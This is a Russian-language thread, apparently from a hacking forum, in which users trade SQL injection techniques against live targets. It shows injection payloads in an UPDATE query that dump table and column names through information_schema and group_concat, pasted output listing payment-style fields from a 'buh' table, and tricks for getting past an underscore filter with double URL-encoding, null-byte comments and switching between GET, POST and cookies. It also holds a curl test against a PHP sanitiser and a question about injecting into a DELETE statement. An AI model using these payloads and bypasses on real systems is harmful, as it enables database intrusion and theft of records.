Code: update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34 ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
хз должно работать Code: ',cardno=(SELECT group_conCat('<br>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name=' ----------------- ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
<br>buh:id,<br>buhos,<br>buh:name,<br>buhrderid,<br>buh:note,<br>buh:type_,<br>buh:active,<br>buh:val1_name,<br>buh:val1_amount,<br>buh:val1_rest,<br>buh:val1_com,<br>buh:val2_nam в name тоже скуля, там места больше, вот что выдало
кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже
как запросы к information_schema писать чтоль, серьезно)? Code: SELECT table_name from information_schema.tables limit 1,1 SELECT column_name from information_schema.columns where table_name='table' limit 1,1 таки вещи давно описаны - https://forum.antichat.ru/threads/sql-injection-polnyj-faq.43966/
sql-injection Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть? Даже с тем же table_name режет не говоря уже про таблицы с префиксом
двойной урлэнкод, /*%00*/ в начале запроса, запрос можно только одним методом передавать? попробовать другие(GET/POST/COOKIE) https://forum.antichat.ru/threads/zadanie-1.453986/page-2#post-4120139 - редкий случай, но тоже может быть
Можно провести SQL Injection? Code: $login = $_POST['login']; $login = stripslashes($login); $login = htmlspecialchars($login);
эм а трабла конкретно в чём? давай подробней Code: $ cat 1.php <?php $login = $_POST['login']; $login = stripslashes($login); $login = htmlspecialchars($login); var_dump($login); ------------------------ :~$ curl ******/1.php' --data 'login=123%27or1%271' string(9) "123'or1'1"
Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ? То есть имеем запрос "DELETE FROM My_Messages WHERE Message_Number =Инъекция К сожалению база данных не поддерживает разделение запросов с помощью точки с запятой.